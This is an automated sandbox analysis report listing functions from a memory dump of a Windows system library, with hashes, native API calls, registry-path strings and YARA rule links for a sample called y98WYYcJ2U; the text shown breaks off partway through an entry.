API String ID: 1355999870-2000027029
Opcode ID: 216d1efde3a7a52fb72521ceac0ae504169c2f99fc1981949d1a280a8d34965c
Instruction ID: 27fd7e32490cadeaf6cb75d7b541b73ee24e806dff6d67c3c81d57f5c9f90b72
Opcode Fuzzy Hash: 216d1efde3a7a52fb72521ceac0ae504169c2f99fc1981949d1a280a8d34965c
Instruction Fuzzy Hash: F231B83170121697D725856DCB90BAEFBE9EF44254F246229DC53E7284EB20EE098690

Uniqueness

Uniqueness Score: -1.00%

Function 72680761, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,00000618,?,?), ref: 7268081A
RtlRaiseException.210A ref: 726BC44F

Strings

Flst, xrefs: 726807A3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateExceptionHeapRaise
String ID: Flst
API String ID: 3789339297-2374792617
Opcode ID: 895cbd20ed9b08349b2ea9144e100405ed16d118d105f4f6d788fa85a9317999
Instruction ID: 84b6e2e0e9b868a7516755ec571e2e8f65cfac5189af9f6b13af160169448f8f
Opcode Fuzzy Hash: 895cbd20ed9b08349b2ea9144e100405ed16d118d105f4f6d788fa85a9317999
Instruction Fuzzy Hash: B24197B1605301CFC709CF18C580A66BBE5EF89714F2089AFE49ACB285D771DA82CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 72642260, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99memorytimeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,00000034,?,?,?,?,?,?,?,?,?,7271ED40,0000004C), ref: 726422CC
TpAllocTimer.210A(00000020,72718DB0,00000000,00000003,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 7264237A

Strings

(, xrefs: 72642348

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocAllocateHeapTimer
String ID: (
API String ID: 2926205940-3887548279
Opcode ID: a8f249bfe4d2aff13423a6ab84c16ad945d0ccf9d3b71faf6272ddf6e4e12c14
Instruction ID: 5b35e87332416371ce57d04421d77b72a8748d2805aa7e6c35f06059936707c6
Opcode Fuzzy Hash: a8f249bfe4d2aff13423a6ab84c16ad945d0ccf9d3b71faf6272ddf6e4e12c14
Instruction Fuzzy Hash: 3F41F6B0D1465ADFCB05CFA8C5406CDBFB5BF0D714F10425AE485A7681CB749A51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 726C3371, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75nativeCOMMON

Download Yara Rule

APIs

ZwOpenKeyEx.210A(00000000,00020019,?,00000000,?,00000000), ref: 726C3481

Strings

\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange, xrefs: 726C3390
\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange\PackageList\%ws, xrefs: 726C33AC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Open
String ID: \Registry\Machine\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange$\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\AppModel\StateChange\PackageList\%ws
API String ID: 71445658-2362267023
Opcode ID: dd070b9b49992f48be8f1ad0820c4a1323b4f7a1c616bf3065237941c471e4e4
Instruction ID: 5d0c575c3b873f5f153ab4defa54860f3851236f9821ca5429a3c8bf08e34897
Opcode Fuzzy Hash: dd070b9b49992f48be8f1ad0820c4a1323b4f7a1c616bf3065237941c471e4e4
Instruction Fuzzy Hash: 04314C71A0122CAACB25DF599C88BDEBBB8EF08300F1041DBD50DE7240D7349B858F94

Uniqueness

Uniqueness Score: -1.00%

Function 72686399, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000, fsr,00000000,7270568E,00000000,?,00000000), ref: 726863AB
RtlGetCurrentServiceSessionId.210A(00000000, fsr,00000000,7270568E,00000000,?,00000000), ref: 726863C6

Strings

fsr, xrefs: 726863A1

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession
String ID: fsr
API String ID: 1007659313-2000027029
Opcode ID: 360abcf37174f71819e1e34d727c5604e488aa74208e1ceb52508ca5d53de361
Instruction ID: 1014e3b61f1c512bb99605524b5dfcfd001c7501a46d59cae85aa34e0725993d
Opcode Fuzzy Hash: 360abcf37174f71819e1e34d727c5604e488aa74208e1ceb52508ca5d53de361
Instruction Fuzzy Hash: 2F112E39201A909BD31A8B2DC1A0B65B3E4FF01708F24145FF8938BBD2D368DC86D320

Uniqueness

Uniqueness Score: -1.00%

Function 726466A4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,UBR,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 726466C5
ZwQueryValueKey.210A(?,?,00000002,?,00000014,?,?,UBR,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 726466DB

Strings

UBR, xrefs: 726466BE

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitQueryStringUnicodeValue
String ID: UBR
API String ID: 3766860702-3525060630
Opcode ID: 443d23421216eeaa4e36be0fa3cda5b8d71bd396e8daa1693c54daf9e45dec45
Instruction ID: b34ef566fa3de3592378ebe0d109fdc9451f1ef4d667b0b4224e31be2c0765d7
Opcode Fuzzy Hash: 443d23421216eeaa4e36be0fa3cda5b8d71bd396e8daa1693c54daf9e45dec45
Instruction Fuzzy Hash: C1017872A00109AFEB01CA98C841AEFB7BDEB49310F10002BE901E7180E731EE06C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 726F87F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DbgPrintEx.210A(00000065,00000000,Critical error detected %lx,?,72720740,00000074,72701AA0,?,?,726FF9AF,00000001,00000020,727358C0,00000000), ref: 726F882A
RtlRaiseException.210A(?), ref: 726F8874

Strings

Critical error detected %lx, xrefs: 726F8821

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExceptionPrintRaise
String ID: Critical error detected %lx
API String ID: 1813208005-802127002
Opcode ID: 5f8786e772f7af0c0a7fdd2b4611b4a30987b05e8075041e2fcb51ce5910cbbd
Instruction ID: b481d4a41751673490753285eebb7e8533d8736bd33412e4d1881a517a7387c8
Opcode Fuzzy Hash: 5f8786e772f7af0c0a7fdd2b4611b4a30987b05e8075041e2fcb51ce5910cbbd
Instruction Fuzzy Hash: A5111575D14349DADF26CFA8C505B9DBBB4BB44705F2042AFD5A5AB2C2C7340601CF58

Uniqueness

Uniqueness Score: -1.00%

Function 72701008, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,?,72705C53,00000002,00000000,?,72736620), ref: 7270102F
ZwTraceEvent.210A(?,00020402,0000000C,?,?,?,?,?,?,?,?,72705C53,00000002,00000000,?,72736620), ref: 7270105C

Strings

fsr, xrefs: 72701061

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID: fsr
API String ID: 171358211-2000027029
Opcode ID: 130db064ec6f76f32e21c3be7574e17c156a49e2747c8e71f1fd33a2e9ff5e02
Instruction ID: c262c51c233d5aed7e5bb0e46412cb11bd782fe62410a84aa86d698493393590
Opcode Fuzzy Hash: 130db064ec6f76f32e21c3be7574e17c156a49e2747c8e71f1fd33a2e9ff5e02
Instruction Fuzzy Hash: F0F04F71A00248EBCB14DFADD545EAEBBF4AF14300F00406AA905EB281E6759910CB98

Uniqueness

Uniqueness Score: -1.00%

Function 726897A2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,00000200,?,72689741,?,00000001,00010000,72687EF6,?,?,?), ref: 726897BC

Strings

`sr, xrefs: 726897D8

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID: `sr
API String ID: 1279760036-3650220147
Opcode ID: 87d633d8ad4aea0701a0cb3b6369c3e72b0d8da12a486a264437edffde7edc30
Instruction ID: 6b5c09045c7b6e4326920c674fbd8232e38c4a7a633f84e600b8c7024a006c24
Opcode Fuzzy Hash: 87d633d8ad4aea0701a0cb3b6369c3e72b0d8da12a486a264437edffde7edc30
Instruction Fuzzy Hash: 76F0E2313419919BE3569E2CDE40F5636A2FB80B04F25483AE142CB6E5EA30E981C684

Uniqueness

Uniqueness Score: -1.00%

Function 7265E370, Relevance: 4.7, APIs: 3, Instructions: 194COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A ref: 7265E3B6
RtlAcquireSRWLockExclusive.210A ref: 7265E47D
RtlReleaseSRWLockExclusive.210A ref: 7265E489

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Release
String ID:
API String ID: 1678258262-0
Opcode ID: 9542ffb158541845f830771638990c5aed83b514c30ab046fef19591b73184e3
Instruction ID: 701404f43de156774ac392d30b1b81067b35e074f0bbfcd841e1168b39ae2841
Opcode Fuzzy Hash: 9542ffb158541845f830771638990c5aed83b514c30ab046fef19591b73184e3
Instruction Fuzzy Hash: B761E13AA042A58FCB1ACF5EC48076A7BB2EF89710F1481AAD856DB385D734D952C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 72682570, Relevance: 4.6, APIs: 3, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,00000000,-00000008,?,00000018,00000000,?,?,726824D5,?,00000018,7265E7AD,?,00000000,?,727379A0), ref: 726825C8
RtlFreeHeap.210A(?,00000000,00000000,-00000008,?,00000018,00000000,?,?,726824D5,?,00000018,7265E7AD,?,00000000,?), ref: 726825DB
RtlReleaseActivationContext.210A(?,?,00000018,00000000,?,?,726824D5,?,00000018,7265E7AD,?,00000000,?,727379A0,727379A0), ref: 726825EE

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FreeHeap$ActivationContextRelease
String ID:
API String ID: 2763193357-0
Opcode ID: a31ec91f417254cef8e3c433842b36c3e9e4bccca385bf7da99eca246cba9252
Instruction ID: 100b518096c8bfc63d09f27849bc78fe092ff5bdbb9705ce5950e4b83ee9b94d
Opcode Fuzzy Hash: a31ec91f417254cef8e3c433842b36c3e9e4bccca385bf7da99eca246cba9252
Instruction Fuzzy Hash: A9412772640681ABC716CF1DC860B66BBBBEF84764F21811BE9075B2D0DB70EC91C791

Uniqueness

Uniqueness Score: -1.00%

Function 72670430, Relevance: 4.6, APIs: 3, Instructions: 133COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(?,7271F8F0,00000020,7266FFBC,?,?,?,?,?,?,00000000,0000000E,00000000), ref: 726704A9
_wcsnicmp.210A(?,?,00000001,7271F8F0,00000020,7266FFBC,?,?,?,?,?,?,00000000,0000000E,00000000), ref: 7267051F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalEnterSection_wcsnicmp
String ID:
API String ID: 2198911780-0
Opcode ID: cbea6d65831dd10f361184ed9db83f80e32ff88027711cfc8ecfe5c07c0c953c
Instruction ID: 06366ac9feec88569ac4df51c5a3505b630feba8b77c402ca775c4a4f8f6d99c
Opcode Fuzzy Hash: cbea6d65831dd10f361184ed9db83f80e32ff88027711cfc8ecfe5c07c0c953c
Instruction Fuzzy Hash: F4513871A0021ADFDF06DF59D980A8EBBB6FF48314F108066E911AB3A0D374D952CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 7267A20E, Relevance: 4.6, APIs: 3, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(00800008,?,00000000,0000008C,7267F281,00000000,?,727384D8,00000000,00000000), ref: 7267A25B
RtlReleaseSRWLockExclusive.210A(00800008,00800008,?,00000000,0000008C,7267F281,00000000,?,727384D8,00000000,00000000), ref: 7267A279
ZwReleaseWorkerFactoryWorker.210A(?), ref: 7267A33B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLockReleaseWorker$AcquireFactory
String ID:
API String ID: 2301053956-0
Opcode ID: 7bb61a615f5380fbb0285af2a9d18de4df9d72273606813be6c5d1ffd07ec1e5
Instruction ID: 6d82f26070888bffdaa5c26e3d375a20923d441fd47b4b8604a72dfbc51f6b73
Opcode Fuzzy Hash: 7bb61a615f5380fbb0285af2a9d18de4df9d72273606813be6c5d1ffd07ec1e5
Instruction Fuzzy Hash: 7B418672604701CFC702CF19D180A0ABBF6BB98724F194A6AE8969B391D730ED44CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 72716202, Relevance: 4.6, APIs: 3, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,00000000,?,?,?,72688A4A,?,00000000,?,00000000,00000018), ref: 72716252
memcpy.210A(?,?,?,?,00000008,00000000,?,?,?,72688A4A,?,00000000,?,00000000,00000018), ref: 727162C3
RtlFreeHeap.210A(?,00000000,00000000,?,00000008,00000000,?,?,?,72688A4A,?,00000000,?,00000000,00000018), ref: 72716314

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$AllocateFreememcpy
String ID:
API String ID: 4030768257-0
Opcode ID: 425d567cc37aa6a96147324dfdb002cecee6657aa648ebfe729eff3ed22efbc7
Instruction ID: e83848744ac6d8478741f42a625ac6efadbc415d199bab60708b3bf33f6d1802
Opcode Fuzzy Hash: 425d567cc37aa6a96147324dfdb002cecee6657aa648ebfe729eff3ed22efbc7
Instruction Fuzzy Hash: F7417272A0010AEFCB05CF98C980A9EBBB5FF85754F24806DE905AB341E731EA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 727151D5, Relevance: 4.6, APIs: 3, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 72713FED: RtlInitUnicodeString.210A(?,?,00000000,00000000,?,00000000,00000000), ref: 7271400F

RtlNtStatusToDosError.210A(00000000,?,00000000,00000000), ref: 727152A5
ZwWaitForSingleObject.210A(?,00000000,00000000), ref: 727152E7
ZwClose.210A(?,?,00000000,00000000), ref: 727152ED

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseErrorInitObjectSingleStatusStringUnicodeWait
String ID:
API String ID: 26037491-0
Opcode ID: 0bac34fb3f6dd0303e7100ffe5c629be292207db81f12b60b1e73226e8806647
Instruction ID: 4db58a2bfb3c58574ea6ef473c9ab27ab13addd446cc42ea63f648e21ca9818d
Opcode Fuzzy Hash: 0bac34fb3f6dd0303e7100ffe5c629be292207db81f12b60b1e73226e8806647
Instruction Fuzzy Hash: 48414CB16047429FC31ACF2DC68179BBBE5BF89714F40491EE89A87341DBB0E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 72684030, Relevance: 4.6, APIs: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,-00000001,00000001,00000001,?,00000000,?,?), ref: 72684071
RtlAppendUnicodeStringToString.210A(00000001,7262114C,00000001,00000001,?,00000000,?,?), ref: 72684090

Part of subcall function 72656B00: memmove.210A(?,?,00000001,-00000001,00000001,00000001,00000000,?,72684095,00000001,7262114C,00000001,00000001,?,00000000,?), ref: 72656B3D

RtlAppendUnicodeStringToString.210A(00000001,?,00000001,7262114C,00000001,00000001,?,00000000,?,?), ref: 726840B1

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: String$AppendUnicode$AllocateHeapmemmove
String ID:
API String ID: 400542772-0
Opcode ID: d5f6f00691fb6d02ad8f40e00e6f0531cb992940bb3e286052cf24b20f3a5932
Instruction ID: 53e51aaca6e91e4d7e19d3d89b92535813580b72bf37c5259f76a9ebd4df48e6
Opcode Fuzzy Hash: d5f6f00691fb6d02ad8f40e00e6f0531cb992940bb3e286052cf24b20f3a5932
Instruction Fuzzy Hash: F631BC71A006558FC72ACF2DC840A6BBBF6EF56714B15806FE986DB3D4EA70D860C790

Uniqueness

Uniqueness Score: -1.00%

Function 7270C677, Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

APIs

memset.210A(00000118,00000000,00000280,0000002C,00000000,00000000,00000118,00000118,?,7270AE9A,00000010,00000000,72710CE0,00000010,7273A73C,,,,), ref: 7270C68D
RtlRunOnceExecuteOnce.210A(727386D0,72673A10,00000000,00000000,?,00000000,00000000), ref: 7270C707
memset.210A(00000158,00000000,00000038,727386D0,72673A10,00000000,00000000,?,00000000,00000000), ref: 7270C730

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Oncememset$Execute
String ID:
API String ID: 3419504278-0
Opcode ID: e07f4dae68c9d2cf09ee4a39565649887bf3787ffded943b3f18ac4dcfe80af0
Instruction ID: e670a4ded2fa090079befa4417b381088d8edc575c4fcb363278a847419f0e67
Opcode Fuzzy Hash: e07f4dae68c9d2cf09ee4a39565649887bf3787ffded943b3f18ac4dcfe80af0
Instruction Fuzzy Hash: 4C31BE72A002059BCB14CF2DDAC5A977FE4EF49310F5184AEEC08DF246D670EA15CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 72655066, Relevance: 4.6, APIs: 3, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,?,000000C8,?,?,?), ref: 726550AB
RtlFreeHeap.210A(?,00000000,?,00000000,?,?,?,?,?,?,000000C8,?,?,?,?,?), ref: 726550FF
RtlFreeHeap.210A(?,00000000,?,00000000,?,?,?,?,?,?,000000C8,?,?,?,?,?), ref: 726A99C0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$Free$Allocate
String ID:
API String ID: 3472947110-0
Opcode ID: b1faffb4e56b2c080e8765e64975d2e206ac172e358a3a083c18371ac6fb796c
Instruction ID: 272e35abb1107ca7353885cc28e372f32d8776dd959fa389f1d276c88bff8dca
Opcode Fuzzy Hash: b1faffb4e56b2c080e8765e64975d2e206ac172e358a3a083c18371ac6fb796c
Instruction Fuzzy Hash: 42315771900149EFCF1A8F9ACD90AAEBFB6FF09344F50406EFA4597254C3319A60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 7265237A, Relevance: 4.6, APIs: 3, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,000000AA,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 726523B7
_allshl.210A(?,00000008,000000AA,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 726523E0

Part of subcall function 72652513: RtlInitUnicodeString.210A(00000019,00800000,00000000,00000000,?,?,726A7DC7,00AA0000,00000019,00000000,?,00000000,?), ref: 72652576

RtlFreeHeap.210A(?,00000000,00000000,?,00000008,000000AA,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 7265246B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$AllocateFreeInitStringUnicode_allshl
String ID:
API String ID: 2993383699-0
Opcode ID: 39f0572cb8f84edea85e25a673852fcd56769c44a108e97e105dd6e3bca694b0
Instruction ID: e09c637eb970fb63a00df96ee48c786f1afac150fbaa6821c63b6f7120ed53d3
Opcode Fuzzy Hash: 39f0572cb8f84edea85e25a673852fcd56769c44a108e97e105dd6e3bca694b0
Instruction Fuzzy Hash: 8A319F32B00245DFC714DFAECA80BAABBFAAB44704F10452BD586D76D1E7709946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 726851C6, Relevance: 4.6, APIs: 3, Instructions: 79nativeCOMMON

Download Yara Rule

APIs

ZwOpenKey.210A(?,00000001,7262144C,?,00000000,727385E0), ref: 72685207

Part of subcall function 7268A300: LdrInitializeThunk.NTDLL(7264E062,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 7268A30A

ZwQueryValueKey.210A(?,72621060,00000002,?,00000010,?,?,00000000,727385E0), ref: 72685239
ZwClose.210A(?,?,00000001,7262144C,?,00000000,727385E0), ref: 726BE88A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
